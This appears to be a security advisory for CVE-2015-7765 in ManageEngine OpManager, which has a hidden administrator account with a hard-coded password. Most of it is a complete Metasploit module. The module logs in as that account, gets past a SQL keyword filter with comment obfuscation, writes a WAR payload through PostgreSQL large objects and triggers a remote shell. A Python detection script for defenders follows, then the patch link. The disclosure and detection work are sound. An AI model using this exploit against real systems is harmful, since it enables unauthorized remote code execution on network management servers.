ZOHO ManageEngine OpManager Hard-Coded Credential Vulnerability (CVE-2015-7765)
Release date:
Updated on:
Affected Systems:
ZOHO ManageEngine OpManager <= 11.5 build 11600
Description:
CVE (CAN) ID: CVE-2015-7765
ZOHO ManageEngine OpManager is network performance management software.
ZOHO ManageEngine OpManager 11.5 build 11600 and earlier versions ship a hidden "IntegrationUser" account with the hard-coded password "plugin". A remote user who authenticates with this password obtains administrator privileges.
Source: xistence (xistence@0x90.nl)
Link: http://seclists.org/fulldisclosure/2015/Sep/66
Test method:
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use at your own risk!
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  # It removes a large object in the database; shouldn't be a problem, but just in case...
  Rank = ManualRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ManageEngine OpManager Remote Code Execution',
      'Description'    => %q{
        This module exploits a default credential vulnerability in ManageEngine OpManager, where a
        default hidden account "IntegrationUser" with administrator privileges exists. The account
        has a default password of "plugin" which cannot be reset through the user interface. By
        logging in and abusing the default administrator's SQL query functionality, it's possible
        to write a WAR payload to disk and trigger an automatic deployment of this payload. This
        module has been tested successfully on OpManager v11.5 and v11.6 for Windows.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'xistence <xistence[at]0x90.nl>' # Discovery, Metasploit module
        ],
      'References'     =>
        [
          ['EDB', '123']
        ],
      'Platform'       => ['java'],
      'Arch'           => ARCH_JAVA,
      'Targets'        =>
        [
          ['ManageEngine OpManager v11.6', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Sep 14 2015',
      'DefaultTarget'  => 0))
  end

  def uri
    target_uri.path
  end

  def check
    # Check version
    vprint_status("#{peer} - Trying to detect ManageEngine OpManager")
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(uri, 'LoginPage.do')
    })

    unless res && res.code == 200
      return Exploit::CheckCode::Safe
    end

    if res.body =~ /OpManager.*v\.([0-9]+\.[0-9]+)<\/span>/
      version = $1
      if Gem::Version.new(version) <= Gem::Version.new('11.6')
        return Exploit::CheckCode::Appears
      else
        # Patch unknown
        return Exploit::CheckCode::Detected
      end
    elsif res.body =~ /OpManager/
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  def sql_query(key, query)
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(uri, 'api', 'json', 'admin', 'SubmitQuery'),
      'vars_get'  => { 'apiKey' => key },
      'vars_post' => { 'query' => query }
    })

    unless res && res.code == 200
      fail_with(Failure::Unknown, "#{peer} - Query was not successful!")
    end

    res
  end

  def exploit
    print_status("#{peer} - Access login page")
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(uri, 'jsp', 'Login.do'),
      'vars_post' => {
        'domainName' => 'NULL',
        'authType'   => 'localUserLogin',
        'userName'   => 'IntegrationUser', # Hidden user
        'password'   => 'plugin'           # Password of the hidden user
      }
    })

    if res && res.code == 302
      redirect = URI(res.headers['Location']).to_s.gsub(/#\//, "")
      print_status("#{peer} - Location is [#{redirect}]")
    else
      fail_with(Failure::Unknown, "#{peer} - Access to login page failed!")
    end

    # Follow the redirect
    print_status("#{peer} - Following redirection")
    res = send_request_cgi({
      'uri'    => redirect,
      'method' => 'GET'
    })

    if res && res.code == 200 && res.body =~ /window\.OPM\.apiKey = "([a-z0-9]+)"/
      api_key = $1
      print_status("#{peer} - Retrieved API key [#{api_key}]")
    else
      fail_with(Failure::Unknown, "#{peer} - Redirect failed!")
    end

    app_base = rand_text_alphanumeric(4 + rand(32 - 4))
    war_payload = payload.encoded_war({ :app_name => app_base }).to_s
    war_payload_base64 = Rex::Text.encode_base64(war_payload).gsub(/\n/, '')

    print_status("#{peer} - Executing SQL queries")

    # Remove large object in database, just in case it exists from previous exploit attempts
    sql = 'select lo_unlink(-1)'
    sql_query(api_key, sql)

    # Create large object "-1". We use "-1" so we will not accidentally overwrite large objects in use by other tasks.
    sql = 'select lo_create(-1)'
    result = sql_query(api_key, sql)

    if result.body =~ /lo_create":([0-9]+)}/
      lo_id = $1
    else
      fail_with(Failure::Unknown, "#{peer} - Large Object ID not found!")
    end

    # Insert WAR payload into the pg_largeobject table. We have to use /**/ to bypass OpManager's checks for INSERT/UPDATE/DELETE, etc.
    sql = "INSERT/**/INTO pg_largeobject (loid, pageno, data) VALUES (#{lo_id}, 0, DECODE('#{war_payload_base64}', 'base64'))"
    sql_query(api_key, sql)

    # Export our large object data into a WAR file
    sql = "SELECT lo_export(#{lo_id}, '../..//tomcat//webapps//#{app_base}.war');"
    sql_query(api_key, sql)

    # Remove our large object from the database
    sql = 'select lo_unlink(-1)'
    sql_query(api_key, sql)

    register_file_for_cleanup("tomcat//webapps//#{app_base}.war")
    register_file_for_cleanup("tomcat//webapps//#{app_base}")

    10.times do
      select(nil, nil, nil, 2)

      # Now make a request to trigger the newly deployed WAR
      print_status("#{peer} - Attempting to launch payload in deployed WAR...")
      res = send_request_cgi({
        'uri'    => normalize_uri(target_uri.path, app_base, "#{Rex::Text.rand_text_alpha(rand(8) + 8)}.jsp"),
        'method' => 'GET'
      })

      # Failure. The request timed out or the server went away.
      break if res.nil?
      # Success! Triggered the payload, should have a shell incoming
      break if res.code == 200
    end
  end
end
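For defenders, here is an added detection example; it is not part of the advisory or of the Metasploit module above. It applies the indicators the module exposes, a login as the hidden IntegrationUser account and SubmitQuery requests carrying PostgreSQL large-object functions or comment-obfuscated DML (the INSERT/**/INTO trick), to a list of request records. It assumes request records with form fields are available, for example from a reverse proxy or WAF that logs POST bodies; the records, form-field names, paths and API key below are constructed for this example, not taken from real traffic.

```python
"""Triage request records for signs of CVE-2015-7765 abuse (added example)."""
import re

# Constructed sample request records: (method, path, form fields).
# Form-field names are assumed; adapt them to what your proxy logs.
SAMPLE_REQUESTS = [
    ("POST", "/jsp/Login.do", {"userName": "admin", "password": "x"}),
    ("POST", "/jsp/Login.do", {"userName": "IntegrationUser", "password": "plugin"}),
    ("POST", "/api/json/admin/SubmitQuery?apiKey=abc123",
     {"query": "select count(*) from alerts"}),
    ("POST", "/api/json/admin/SubmitQuery?apiKey=abc123",
     {"query": "select lo_create(-1)"}),
    ("POST", "/api/json/admin/SubmitQuery?apiKey=abc123",
     {"query": "INSERT/**/INTO pg_largeobject (loid, pageno, data) "
               "VALUES (12345, 0, DECODE('UEsDBA==', 'base64'))"}),
    ("POST", "/api/json/admin/SubmitQuery?apiKey=abc123",
     {"query": "SELECT lo_export(12345, '../../tomcat/webapps/xyz.war');"}),
    ("GET", "/xyz/abcdefgh.jsp", {}),
]

HIDDEN_ACCOUNT = "integrationuser"
# Large-object functions and catalog table used to write files from SQL.
LARGE_OBJECT_TOKENS = ("lo_create", "lo_export", "lo_import", "lo_unlink", "pg_largeobject")
# Statements an admin "query" endpoint should never need.
DML_RE = re.compile(r"^(insert|update|delete|create|drop|alter|copy)\b", re.IGNORECASE)


def normalize_sql(query):
    """Strip block and line comments and collapse whitespace.

    A keyword check that runs on the raw text is bypassed by an empty block
    comment ("INSERT/**/INTO"); normalizing first makes the check robust.
    Comment markers inside string literals are also stripped, which is
    acceptable for detection (it errs toward flagging).
    """
    no_block = re.sub(r"/\*.*?\*/", " ", query, flags=re.DOTALL)
    no_line = re.sub(r"--[^\n]*", " ", no_block)
    return re.sub(r"\s+", " ", no_line).strip()


def _field(form, name):
    """Case-insensitive form-field lookup (field-name casing varies by build)."""
    for key, value in form.items():
        if key.lower() == name.lower():
            return value
    return ""


def classify(method, path, form):
    """Return the list of finding tags for one request record (empty if benign)."""
    findings = []
    base_path = path.split("?", 1)[0].lower()

    # Any login with the hidden account is suspicious: it is not meant for humans.
    if base_path.endswith("/login.do") and _field(form, "userName").lower() == HIDDEN_ACCOUNT:
        findings.append("hidden-account-login")

    if base_path.endswith("/api/json/admin/submitquery"):
        sql = normalize_sql(_field(form, "query"))
        if DML_RE.match(sql):
            findings.append("dml-via-submitquery")
        if any(token in sql.lower() for token in LARGE_OBJECT_TOKENS):
            findings.append("large-object-access")

    return findings


def triage(records):
    """Return (index, findings) for every record that produced at least one finding."""
    hits = []
    for index, (method, path, form) in enumerate(records):
        findings = classify(method, path, form)
        if findings:
            hits.append((index, findings))
    return hits


if __name__ == "__main__":
    for index, findings in triage(SAMPLE_REQUESTS):
        method, path, _ = SAMPLE_REQUESTS[index]
        print(f"record {index}: {method} {path} -> {', '.join(findings)}")
```

Two records in the sample chain together, a hidden-account login followed by large-object queries on SubmitQuery, which is the sequence the module above performs; a single hidden-account login is worth an alert on its own, since the vendor describes the account as an integration hook rather than an interactive user.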
Suggestion:
Vendor patch:
Zoho
----
The vendor has released a patch for this security problem. Please download it from the vendor's support site:
https://support.zoho.com/portal/manageengine/helpcenter/articles/pgsql-submitquery-do-vulnerability